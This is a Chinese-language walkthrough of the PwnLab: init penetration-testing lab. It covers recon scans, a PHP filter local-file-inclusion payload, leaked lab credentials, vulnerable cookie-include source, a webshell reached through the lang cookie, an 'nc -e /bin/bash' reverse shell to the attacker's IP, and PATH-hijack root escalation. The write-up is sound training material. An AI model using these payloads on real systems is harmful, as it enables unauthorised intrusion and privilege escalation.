【pwnlab_init靶场渗透】

文章目录

一、基础信息

二、信息收集

三、漏洞利用

四、反弹shell

五、提权


一、基础信息

Kali IP :192.168.20.146

靶机IP:192.168.20.157

二、信息收集

nmap -sS -sV -p- -A 192.168.20.157

开放了80、111、3306、50749等端口

访问一下80端口

提示使用这个服务进行上传和共享图片文件等,点击一下upload需要登录

扫描目录看一下

dirsearch -u http://192.168.20.157 -x 403

访问images目录看到有一张图片,保存到本地看一下有没有信息

http://192.168.20.157/images/pwnlab.png

好像没啥内容,然后看到了文件上传的目录

http://192.168.20.157/upload/

然后有几个php文件,但是访问没有内容显示

三、漏洞利用

通过观察网址有可能是存在文件包含的,利用php伪协议进行查看文件

包含config文件,经过尝试后要去掉php后缀

http://192.168.20.157/?page=php://filter/convert.base64-encode/resource=config

解码得到数据库密码,同时可以尝试包含upload和index文件,解码可得到源码

连接数据库查看账户信息

得到三个用户和密码信息,密码疑似base64加密,可进行解密得到密码

kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

尝试登录之前的页面

登录成功,尝试上传文件

上传成功

前面知道上传地址,蚁剑访问一下,连接不成功

分析index.php源代码,它以cookie的值作为路径,这个参数为lang

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.

那我们就添加一个cookie:lang=../upload/85bb6e49a1be4be02eefb660f9d8cf68.jpg

连接成功

四、反弹shell

nc -e /bin/bash 192.168.20.146 9090

五、提权

上面获得了三个账户密码,尝试登录一下

kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo

Mike账户无法登录,Kent登录后没发现特殊内容

登录到kane用户,发现家目录下有个msgmike文件,但是文件拥有者是mike,不是很清楚文件是干什么的,看wp提示说该程序的作者试图在cat不提供完整路径的情况下运行了命令!

提权方法:

在运行Bash程序cat的/tmp目录中创建了一个文件shell,并将其添加到$PATH环境变量的开头,系统先cat在/tmp目录中查找二进制文件,并将执行我们的shell!

在tmp目录下:

echo /bin/bash > cat    ---创建一个shell命令的文件:/bin/sh
chmod 777 cat         ---赋权
export PATH=/tmp:$PATH  ---赋予tmp目录环境变量
cd && ./msgmike

cd /home/mike

在mike目录下存在msg2root文件,但是文件拥有者为root

尝试再次执行不完整路径任意命令sh,成功获得root权限!

./msg2root
; /bin/bash -p
more /root/flag.txt
相关推荐
vortex51 小时前
在Kali中使用虚拟环境安装python工具的最佳实践:以 pwncat 为例
linux·python·网络安全·渗透测试·pip·kali
Codingwiz_Joy1 小时前
Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器
android·安全·web安全·安全性测试
网络安全Ash5 小时前
2025网络安全漏洞
安全·web安全
黑客KKKing6 小时前
Refreshtoken 前端 安全 前端安全方面
大数据·前端·网络·安全·web安全
H轨迹H6 小时前
Vulnhub-election靶机
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
豪门土狗7 小时前
渗透测试之利用sql拿shell(附完整流程+防御方案)【上】
数据库·笔记·sql·网络安全
Hacker_Fuchen8 小时前
网络安全配置截图 网络安全i
网络·安全·web安全
vortex58 小时前
问题解决:Kali Linux 中配置启用 Vim 复制粘贴功能
linux·运维·网络安全·vim
远川_Horizon11 小时前
Lab17_ Blind SQL injection with out-of-band data exfiltration
sql·web安全
MC何失眠13 小时前
vulnhub靶场之【digitalworld.local系列】的snakeoil靶机
网络·学习·安全·web安全·网络安全